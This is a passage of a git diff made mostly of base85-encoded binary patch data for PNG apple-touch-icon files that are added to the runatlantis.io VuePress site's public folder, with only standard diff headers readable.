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 literal 0 HcmV?d00001 diff --git a/runatlantis.io/.vuepress/public/apple-touch-icon-152x152.png b/runatlantis.io/.vuepress/public/apple-touch-icon-152x152.png new file mode 100644 index 0000000000000000000000000000000000000000..fdcae677fc9efa91b92bef51df91b8577f54828c GIT binary patch literal 16807 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 